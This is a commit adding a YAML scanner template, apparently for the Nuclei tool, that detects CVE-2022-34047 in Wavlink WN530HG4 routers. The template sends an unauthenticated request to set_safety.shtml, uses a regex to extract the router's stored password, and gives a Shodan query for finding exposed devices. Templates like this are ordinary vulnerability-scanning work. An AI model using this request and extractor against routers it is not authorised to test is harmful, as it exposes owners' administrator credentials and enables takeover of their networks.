Merge pull request #4876 from For3stCo1d/CVE-2022-34047

Create CVE-2022-34047.yaml
2022-07-21 13:55:42 +05:30 · 2022-07-21 13:55:42 +05:30 · 6853f00f92
parent f03da60adc b2cdaa30b1
commit 6853f00f92
1 changed files with 39 additions and 0 deletions
--- a/cves/2022/CVE-2022-34047.yaml
+++ b/cves/2022/CVE-2022-34047.yaml
@ -0,0 +1,39 @@
+id: CVE-2022-34047
+
+info:
+  name: Wavlink Set_safety.shtml - Password Exposure
+  author: For3stCo1d
+  severity: high
+  description: |
+    An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd].
+  reference:
+    - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
+  metadata:
+    verified: true
+    shodan-query: http.title:"Wi-Fi APP Login"
+  tags: cve,cve2022,wavlink,router,exposure
+
+requests:
+  - raw:
+      - |
+        GET /set_safety.shtml?r=52300 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'var syspasswd="'
+          - '<title>APP</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        regex:
+          - 'syspasswd="(.+?)"'